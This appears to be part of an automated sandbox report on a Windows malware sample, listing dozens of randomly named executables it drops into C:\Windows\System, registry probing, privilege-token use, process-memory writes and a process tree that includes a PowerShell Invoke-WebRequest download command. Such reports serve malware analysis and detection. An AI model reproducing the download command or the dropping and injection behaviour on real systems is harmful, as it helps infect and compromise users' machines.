File created C:\Windows\System\jObChqL.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AfftGEx.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PAPAuCe.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fGkFICe.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QVspsDM.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VlSUARJ.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XwTWDbI.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OWXStuq.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jtWBjvZ.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DdEnSgl.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RtLVtOo.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vydEAlT.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RtFPqiz.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HusCSXw.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\Uavejfn.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gAwSEeH.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XKUdNae.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\acFWesO.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AbzEjiz.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HWpEWZq.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZWhSdrK.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tadPoav.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wwGgUvn.exe C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5076 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5076 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\RzQbsUy.exe
PID 5076 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\RzQbsUy.exe
PID 5076 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\Jvoylpo.exe
PID 5076 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\Jvoylpo.exe
PID 5076 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\oMLDXpY.exe
PID 5076 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\oMLDXpY.exe
PID 5076 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\bZYeUPE.exe
PID 5076 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\bZYeUPE.exe
PID 5076 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\fpfJhZN.exe
PID 5076 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\fpfJhZN.exe
PID 5076 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\hWUnCgR.exe
PID 5076 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\hWUnCgR.exe
PID 5076 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\rHHLJfh.exe
PID 5076 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\rHHLJfh.exe
PID 5076 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\bQGmqDs.exe
PID 5076 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\bQGmqDs.exe
PID 5076 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\RjsacaJ.exe
PID 5076 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\RjsacaJ.exe
PID 5076 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\KLcVAHy.exe
PID 5076 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\KLcVAHy.exe
PID 5076 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\mATRJEd.exe
PID 5076 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\mATRJEd.exe
PID 5076 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\VigWBwe.exe
PID 5076 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\VigWBwe.exe
PID 5076 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\zRORSfh.exe
PID 5076 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\zRORSfh.exe
PID 5076 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\KyYyQCe.exe
PID 5076 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\KyYyQCe.exe
PID 5076 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\yUpMrha.exe
PID 5076 wrote to memory of 3292 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\yUpMrha.exe
PID 5076 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\LGdkhVO.exe
PID 5076 wrote to memory of 4728 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\LGdkhVO.exe
PID 5076 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\TQwLsYt.exe
PID 5076 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\TQwLsYt.exe
PID 5076 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\XSTWMcU.exe
PID 5076 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\XSTWMcU.exe
PID 5076 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\lVErAaq.exe
PID 5076 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\lVErAaq.exe
PID 5076 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\lFIifHV.exe
PID 5076 wrote to memory of 2200 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\lFIifHV.exe
PID 5076 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\dzgoZLU.exe
PID 5076 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\dzgoZLU.exe
PID 5076 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\hlHUBLi.exe
PID 5076 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\hlHUBLi.exe
PID 5076 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\xbBXeac.exe
PID 5076 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\xbBXeac.exe
PID 5076 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\JYIkKUo.exe
PID 5076 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\JYIkKUo.exe
PID 5076 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gGhCRUh.exe
PID 5076 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\gGhCRUh.exe
PID 5076 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\xXhBCyi.exe
PID 5076 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\xXhBCyi.exe
PID 5076 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\yEgAAJb.exe
PID 5076 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\yEgAAJb.exe
PID 5076 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\vkFfbig.exe
PID 5076 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\vkFfbig.exe
PID 5076 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\HWyoeMX.exe
PID 5076 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\HWyoeMX.exe
PID 5076 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\rKNkxMb.exe
PID 5076 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\rKNkxMb.exe
PID 5076 wrote to memory of 3556 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\KRXBWIS.exe
PID 5076 wrote to memory of 3556 N/A C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe C:\Windows\System\KRXBWIS.exe

Processes

C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\aba939d9c5814c80153f1f1be36287c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\RzQbsUy.exe

C:\Windows\System\RzQbsUy.exe

C:\Windows\System\Jvoylpo.exe

C:\Windows\System\Jvoylpo.exe

C:\Windows\System\oMLDXpY.exe

C:\Windows\System\oMLDXpY.exe

C:\Windows\System\bZYeUPE.exe

C:\Windows\System\bZYeUPE.exe

C:\Windows\System\fpfJhZN.exe

C:\Windows\System\fpfJhZN.exe

C:\Windows\System\hWUnCgR.exe

C:\Windows\System\hWUnCgR.exe

C:\Windows\System\rHHLJfh.exe

C:\Windows\System\rHHLJfh.exe

C:\Windows\System\bQGmqDs.exe

C:\Windows\System\bQGmqDs.exe

C:\Windows\System\RjsacaJ.exe

C:\Windows\System\RjsacaJ.exe

C:\Windows\System\KLcVAHy.exe

C:\Windows\System\KLcVAHy.exe

C:\Windows\System\mATRJEd.exe

C:\Windows\System\mATRJEd.exe

C:\Windows\System\VigWBwe.exe

C:\Windows\System\VigWBwe.exe

C:\Windows\System\zRORSfh.exe

C:\Windows\System\zRORSfh.exe

C:\Windows\System\KyYyQCe.exe

C:\Windows\System\KyYyQCe.exe

C:\Windows\System\yUpMrha.exe

C:\Windows\System\yUpMrha.exe

C:\Windows\System\LGdkhVO.exe

C:\Windows\System\LGdkhVO.exe

C:\Windows\System\TQwLsYt.exe

C:\Windows\System\TQwLsYt.exe

C:\Windows\System\XSTWMcU.exe

C:\Windows\System\XSTWMcU.exe

C:\Windows\System\lVErAaq.exe

C:\Windows\System\lVErAaq.exe

C:\Windows\System\lFIifHV.exe

C:\Windows\System\lFIifHV.exe

C:\Windows\System\dzgoZLU.exe

C:\Windows\System\dzgoZLU.exe

C:\Windows\System\hlHUBLi.exe

C:\Windows\System\hlHUBLi.exe

C:\Windows\System\xbBXeac.exe

C:\Windows\System\xbBXeac.exe

C:\Windows\System\JYIkKUo.exe

C:\Windows\System\JYIkKUo.exe

C:\Windows\System\gGhCRUh.exe

C:\Windows\System\gGhCRUh.exe

C:\Windows\System\xXhBCyi.exe

C:\Windows\System\xXhBCyi.exe

C:\Windows\System\yEgAAJb.exe

C:\Windows\System\yEgAAJb.exe

C:\Windows\System\vkFfbig.exe

C:\Windows\System\vkFfbig.exe

C:\Windows\System\HWyoeMX.exe

C:\Windows\System\HWyoeMX.exe

C:\Windows\System\rKNkxMb.exe

C:\Windows\System\rKNkxMb.exe

C:\Windows\System\KRXBWIS.exe

C:\Windows\System\KRXBWIS.exe

C:\Windows\System\dQTxAmp.exe

C:\Windows\System\dQTxAmp.exe

C:\Windows\System\XISNVfW.exe

C:\Windows\System\XISNVfW.exe

C:\Windows\System\tGpImCo.exe

C:\Windows\System\tGpImCo.exe

C:\Windows\System\WndMRtP.exe

C:\Windows\System\WndMRtP.exe

C:\Windows\System\fUcktTn.exe

C:\Windows\System\fUcktTn.exe

C:\Windows\System\qnmuzFq.exe

C:\Windows\System\qnmuzFq.exe

C:\Windows\System\BuXqwac.exe

C:\Windows\System\BuXqwac.exe

C:\Windows\System\lIcyPFQ.exe

C:\Windows\System\lIcyPFQ.exe

C:\Windows\System\UTmuzpr.exe

C:\Windows\System\UTmuzpr.exe

C:\Windows\System\OmTDpRE.exe

C:\Windows\System\OmTDpRE.exe

C:\Windows\System\bGArIyN.exe

C:\Windows\System\bGArIyN.exe

C:\Windows\System\CtPDPQP.exe

C:\Windows\System\CtPDPQP.exe

C:\Windows\System\taNgYWk.exe

C:\Windows\System\taNgYWk.exe

C:\Windows\System\FrUKlBi.exe

C:\Windows\System\FrUKlBi.exe

C:\Windows\System\jcQHwWq.exe

C:\Windows\System\jcQHwWq.exe

C:\Windows\System\BZFkXMN.exe

C:\Windows\System\BZFkXMN.exe

C:\Windows\System\fDkedUc.exe

C:\Windows\System\fDkedUc.exe

C:\Windows\System\eVcmRwf.exe

C:\Windows\System\eVcmRwf.exe

C:\Windows\System\uyDhrzn.exe

C:\Windows\System\uyDhrzn.exe

C:\Windows\System\suZCcVU.exe

C:\Windows\System\suZCcVU.exe

C:\Windows\System\TNrTAEL.exe

C:\Windows\System\TNrTAEL.exe

C:\Windows\System\JJzWesS.exe

C:\Windows\System\JJzWesS.exe

C:\Windows\System\TYTcrVH.exe

C:\Windows\System\TYTcrVH.exe

C:\Windows\System\zjbhmFQ.exe

C:\Windows\System\zjbhmFQ.exe

C:\Windows\System\mSSgNDF.exe

C:\Windows\System\mSSgNDF.exe

C:\Windows\System\XDKCmZn.exe

C:\Windows\System\XDKCmZn.exe

C:\Windows\System\KlYXJCI.exe

C:\Windows\System\KlYXJCI.exe

C:\Windows\System\uwbGlyo.exe

C:\Windows\System\uwbGlyo.exe

C:\Windows\System\tTFhKTo.exe

C:\Windows\System\tTFhKTo.exe

C:\Windows\System\AFvGUVy.exe

C:\Windows\System\AFvGUVy.exe

C:\Windows\System\PsWjfqX.exe

C:\Windows\System\PsWjfqX.exe

C:\Windows\System\rqdqObP.exe

C:\Windows\System\rqdqObP.exe

C:\Windows\System\OhObzmn.exe

C:\Windows\System\OhObzmn.exe

C:\Windows\System\cxhbfMY.exe

C:\Windows\System\cxhbfMY.exe

C:\Windows\System\ZQkpDwf.exe

C:\Windows\System\ZQkpDwf.exe

C:\Windows\System\YANoLFU.exe

C:\Windows\System\YANoLFU.exe

C:\Windows\System\qvuTqpc.exe

C:\Windows\System\qvuTqpc.exe

C:\Windows\System\gljxigi.exe

C:\Windows\System\gljxigi.exe

C:\Windows\System\WpqNKKp.exe

C:\Windows\System\WpqNKKp.exe

C:\Windows\System\bnVtNbH.exe

C:\Windows\System\bnVtNbH.exe

C:\Windows\System\shWKMBx.exe

C:\Windows\System\shWKMBx.exe

C:\Windows\System\kuAIIqZ.exe

C:\Windows\System\kuAIIqZ.exe

C:\Windows\System\FkjZPbw.exe

C:\Windows\System\FkjZPbw.exe

C:\Windows\System\xQIzaYl.exe

C:\Windows\System\xQIzaYl.exe

C:\Windows\System\kiKNiFO.exe

C:\Windows\System\kiKNiFO.exe

C:\Windows\System\jDlWeth.exe

C:\Windows\System\jDlWeth.exe

C:\Windows\System\VKnhGKv.exe

C:\Windows\System\VKnhGKv.exe

C:\Windows\System\XwTWDbI.exe

C:\Windows\System\XwTWDbI.exe

C:\Windows\System\NcPjzBR.exe

C:\Windows\System\NcPjzBR.exe

C:\Windows\System\oegUoop.exe

C:\Windows\System\oegUoop.exe

C:\Windows\System\xebcZdG.exe

C:\Windows\System\xebcZdG.exe

C:\Windows\System\pPmBweL.exe

C:\Windows\System\pPmBweL.exe

C:\Windows\System\TyyGQNK.exe

C:\Windows\System\TyyGQNK.exe

C:\Windows\System\HWiHeub.exe

C:\Windows\System\HWiHeub.exe

C:\Windows\System\TgvGrkd.exe

C:\Windows\System\TgvGrkd.exe

C:\Windows\System\rArzweq.exe

C:\Windows\System\rArzweq.exe

C:\Windows\System\EbCjqDM.exe

C:\Windows\System\EbCjqDM.exe

C:\Windows\System\hrfycER.exe

C:\Windows\System\hrfycER.exe

C:\Windows\System\aMsdEJg.exe

C:\Windows\System\aMsdEJg.exe

C:\Windows\System\UzZGowE.exe

C:\Windows\System\UzZGowE.exe

C:\Windows\System\RmeLqXk.exe

C:\Windows\System\RmeLqXk.exe

C:\Windows\System\gUTMZEW.exe

C:\Windows\System\gUTMZEW.exe

C:\Windows\System\bATgNAw.exe

C:\Windows\System\bATgNAw.exe

C:\Windows\System\USokLQT.exe

C:\Windows\System\USokLQT.exe

C:\Windows\System\gsqKHKz.exe

C:\Windows\System\gsqKHKz.exe

C:\Windows\System\exKNJLb.exe

C:\Windows\System\exKNJLb.exe

C:\Windows\System\bElrTLA.exe

C:\Windows\System\bElrTLA.exe

C:\Windows\System\nAiqvXY.exe

C:\Windows\System\nAiqvXY.exe

C:\Windows\System\ymhNURb.exe

C:\Windows\System\ymhNURb.exe

C:\Windows\System\OVQSIvm.exe

C:\Windows\System\OVQSIvm.exe

C:\Windows\System\qgjbmIj.exe

C:\Windows\System\qgjbmIj.exe

C:\Windows\System\cVrqvvM.exe

C:\Windows\System\cVrqvvM.exe

C:\Windows\System\CTiibbF.exe

C:\Windows\System\CTiibbF.exe

C:\Windows\System\XHDqwCZ.exe

C:\Windows\System\XHDqwCZ.exe

C:\Windows\System\MVUFrRS.exe

C:\Windows\System\MVUFrRS.exe

C:\Windows\System\UfiXtIO.exe

C:\Windows\System\UfiXtIO.exe

C:\Windows\System\nbPgYZW.exe

C:\Windows\System\nbPgYZW.exe

C:\Windows\System\xOfjplf.exe

C:\Windows\System\xOfjplf.exe

C:\Windows\System\wsUotgk.exe

C:\Windows\System\wsUotgk.exe

C:\Windows\System\DpVOIBE.exe

C:\Windows\System\DpVOIBE.exe

C:\Windows\System\ZzIPbHN.exe

C:\Windows\System\ZzIPbHN.exe

C:\Windows\System\ziDTHfn.exe

C:\Windows\System\ziDTHfn.exe

C:\Windows\System\eLePKZi.exe

C:\Windows\System\eLePKZi.exe

C:\Windows\System\lXPhTSr.exe

C:\Windows\System\lXPhTSr.exe

C:\Windows\System\hdNjrDI.exe

C:\Windows\System\hdNjrDI.exe

C:\Windows\System\aaDUEqk.exe

C:\Windows\System\aaDUEqk.exe

C:\Windows\System\VePqSyu.exe

C:\Windows\System\VePqSyu.exe

C:\Windows\System\UeBykbE.exe

C:\Windows\System\UeBykbE.exe

C:\Windows\System\qGJMkjG.exe

C:\Windows\System\qGJMkjG.exe

C:\Windows\System\OGBAZHk.exe

C:\Windows\System\OGBAZHk.exe

C:\Windows\System\KUkpbPZ.exe

C:\Windows\System\KUkpbPZ.exe

C:\Windows\System\jdBapkI.exe

C:\Windows\System\jdBapkI.exe

C:\Windows\System\tuSjFiC.exe

C:\Windows\System\tuSjFiC.exe

C:\Windows\System\aHEeRiT.exe

C:\Windows\System\aHEeRiT.exe

C:\Windows\System\zOFZyQu.exe

C:\Windows\System\zOFZyQu.exe

C:\Windows\System\OCQZtHd.exe

C:\Windows\System\OCQZtHd.exe

C:\Windows\System\IbHHCpM.exe

C:\Windows\System\IbHHCpM.exe

C:\Windows\System\dRcWIcp.exe

C:\Windows\System\dRcWIcp.exe

C:\Windows\System\xmcMnSo.exe

C:\Windows\System\xmcMnSo.exe

C:\Windows\System\nVhWMEK.exe

C:\Windows\System\nVhWMEK.exe

C:\Windows\System\CgSTXPY.exe

C:\Windows\System\CgSTXPY.exe

C:\Windows\System\waWPzKM.exe

C:\Windows\System\waWPzKM.exe

C:\Windows\System\HCaSKAc.exe

C:\Windows\System\HCaSKAc.exe

C:\Windows\System\bFZCIPt.exe

C:\Windows\System\bFZCIPt.exe

C:\Windows\System\wmeDCEw.exe

C:\Windows\System\wmeDCEw.exe

C:\Windows\System\UwNNrSU.exe

C:\Windows\System\UwNNrSU.exe

C:\Windows\System\pFxtapX.exe

C:\Windows\System\pFxtapX.exe

C:\Windows\System\vrtSUHj.exe

C:\Windows\System\vrtSUHj.exe

C:\Windows\System\JQxvSGS.exe

C:\Windows\System\JQxvSGS.exe

C:\Windows\System\gaPTAxf.exe

C:\Windows\System\gaPTAxf.exe

C:\Windows\System\MTjjles.exe

C:\Windows\System\MTjjles.exe

C:\Windows\System\pejPhED.exe

C:\Windows\System\pejPhED.exe

C:\Windows\System\uxsblKp.exe

C:\Windows\System\uxsblKp.exe

C:\Windows\System\FvdrvTx.exe

C:\Windows\System\FvdrvTx.exe

C:\Windows\System\aPdTTgX.exe

C:\Windows\System\aPdTTgX.exe

C:\Windows\System\HkAcBBv.exe

C:\Windows\System\HkAcBBv.exe

C:\Windows\System\JdCxosG.exe

C:\Windows\System\JdCxosG.exe

C:\Windows\System\TVbHQIY.exe

C:\Windows\System\TVbHQIY.exe

C:\Windows\System\lBhYspr.exe

C:\Windows\System\lBhYspr.exe

C:\Windows\System\mwyqCKI.exe

C:\Windows\System\mwyqCKI.exe

C:\Windows\System\dfNrXMu.exe

C:\Windows\System\dfNrXMu.exe

C:\Windows\System\fTUMdLY.exe

C:\Windows\System\fTUMdLY.exe

C:\Windows\System\NRiGqpT.exe

C:\Windows\System\NRiGqpT.exe

C:\Windows\System\ELNdVZT.exe

C:\Windows\System\ELNdVZT.exe

C:\Windows\System\HKVzBYf.exe

C:\Windows\System\HKVzBYf.exe

C:\Windows\System\wmgpFSb.exe

C:\Windows\System\wmgpFSb.exe

C:\Windows\System\xfHELpI.exe

C:\Windows\System\xfHELpI.exe

C:\Windows\System\YVySMhM.exe

C:\Windows\System\YVySMhM.exe

C:\Windows\System\ZfBkWkq.exe

C:\Windows\System\ZfBkWkq.exe

C:\Windows\System\vwcHsIU.exe

C:\Windows\System\vwcHsIU.exe

